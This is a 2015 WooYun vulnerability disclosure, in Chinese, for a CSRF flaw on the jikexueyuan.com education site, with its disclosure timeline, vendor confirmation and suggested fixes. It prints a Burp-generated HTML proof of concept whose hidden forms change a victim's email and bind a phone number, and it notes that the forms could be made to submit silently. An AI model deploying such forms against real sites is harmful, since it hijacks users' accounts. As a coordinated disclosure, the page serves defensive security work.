当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135307

漏洞标题:极客学院某处CSRF

相关厂商:jikexueyuan.com

漏洞作者: Security

提交时间:2015-08-19 15:06

修复时间:2015-10-03 15:14

公开时间:2015-10-03 15:14

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

极客学院
IT在线教育平台-中国最大的IT职业在线教育平台
-------------------------------------------

详细说明:

说明:如果用户邮箱和手机都验证过,那么此漏洞不成立,如果其中一个没有验证,那么此漏洞成立。
故评价:中危漏洞
1、首先账号在未验证邮箱的情况下,我们可以随意修改邮箱地址。

未验证邮箱.png


2、用burp抓取修改邮箱的请求消息,然后,找到历史记录,在有changEmail的链接上右击依次选择1.2.3。将自动构造CSRF POC

抓包自动构造CSRF POC.png


用burp生成的代码如下:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<title>极客学院CSRF</title>
<body>
<form action="http://www.jikexueyuan.com/member/changeEmail">
<input type="hidden" name="email" value="138oo138o00@sina.com" />
<input type="submit" value="修改邮箱" />
</form>
<form action="http://www.jikexueyuan.com/member/sendemail">
<input type="hidden" name="email" value="138oo138o00@sina.com" />
<input type="submit" value="验证邮箱" />
</form>
<form action="http://www.jikexueyuan.com/member/sendPhoneMsg">
<input type="hidden" name="phoneNumber" value="13800138000" />
<input type="submit" value="绑定手机" />
</form>
</body>
</html>


当点击修改邮箱按钮之后(当然,也可以设置为自动提交,并且在网页上不输出信息,这样更隐蔽),邮箱就被修改为138oo138o00@sina.com

邮箱被修改.png


3、修改完邮箱,之后就是发送验证邮箱的邮件了。方法同2,当点击验证邮箱时,将发送验证链接到sina邮箱。

收到邮件.png


点击之后,成功激活邮箱。因为邮箱绑定之后是无法更换的,所以还是有危害的,不是吗?
4、绑定手机同理,方法和上面操作一样。

漏洞证明:

绑定成功.png


还有:验证邮件的发送次数和频率要有限制。

修复方案:

加令牌:在页面添加token。
验来自:判断是不是当前网站发出的请求。
输密码:在有设计到关键操作的时候,让用户重新输入密码。

版权声明:转载请注明来源 Security@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-08-19 15:14

厂商回复:

确认,感谢~

最新状态:

暂无


漏洞评价:

评论